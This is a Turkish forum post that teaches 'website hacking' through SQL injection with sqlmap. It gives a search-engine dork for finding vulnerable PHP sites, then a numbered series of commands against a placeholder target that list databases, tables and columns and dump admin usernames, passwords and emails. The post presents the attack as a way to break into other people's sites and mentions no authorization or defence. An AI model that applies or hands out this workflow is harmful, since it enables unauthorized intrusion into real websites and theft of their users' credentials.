İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

SQL injeksiyon yöntemi ile Website Hackleme . Video izlemeli

nessina - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2009
Mesajlar:
29
Konular:
13
Teşekkür (Etti):
26
Teşekkür (Aldı):
11
Ticaret:
(0) %
11-04-2019 17:41
#1
Arrow
SQL injeksiyon yöntemi ile Website Hackleme . Video izle
Sqlmap python dili ile yazılmış açık kaynak kodlu,sql injection açığını tespit ve istismar eden bir araçtır. Bu araç sizin belirtmiş olduğunuz girdiler ile hedef site üzerinde kombinasyonları deneyerek açık aramaya çalışır. Kali Linux işletim sistemi üzerinde hazır olarak gelen bu araç, Windows işletim sistemi ve diğer Linux işletim sistemi kullanıcılarına da açıktır. İndirmek için “http://sqlmap.org/” adresine gidebilirsiniz.Ancak Kali Linux makinesinde zaten var bunun için indirmeye gerek yok. SQL taramaları bir proğramdan ziyade el ile yapılan manuel ayarlamalar daha iyi sonuç verir. Nitekim videoda olduğu gibi bende manuel tarama yaptım.



Videoyu buradan izliyebilirsiniz



1) Tarayıcımızdan aşağıdaki komutu girerek sql açığı olan siteleri karşımıza çıkarır

inurl='php id= 2'


2) Daha sonra bulduğumzun sitenin URL'sini kopyalayıp kali linux makinamızdan terminali açıyoruz ve aşağıdaki komutu yazıyoruz


sqlmap -u “https://www.hedefsite.com/php?id=2" --dbs


3) Çıkan verilerde eğer databasesi çıkmadıysa bu komutu giriyoruz

sqlmap -u “https://www.hedefsite.com/php?id=2" --current-db


4) Aşağıdaki kod ise “veritabani_adi” adlı veritabanındaki tabloların isimlerini listeler


sqlmap -u “https://www.hedefsite.com/php?id=2" -D veritabanı ismi --tables

5) Aşağıdaki kod ise kolonları getirir


sqlmap -u “https://www.hedefsite.com/php?id=2" -D veritabanı ismi -T admin --columns


6) Aşağıdaki kod ise kolonlarda yer alan veriler ekrana yansıtılır.


sqlmap -u “https://www.hedefsite.com/php?id=2" -D veritabanı ismi -T admin -C admin,password,email --dump

VİDEOYU BURADAN İZLİYEBİLİRSİNİZ
Konu nessina tarafından (12-04-2019 07:19 Saat 07:19 ) değiştirilmiştir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı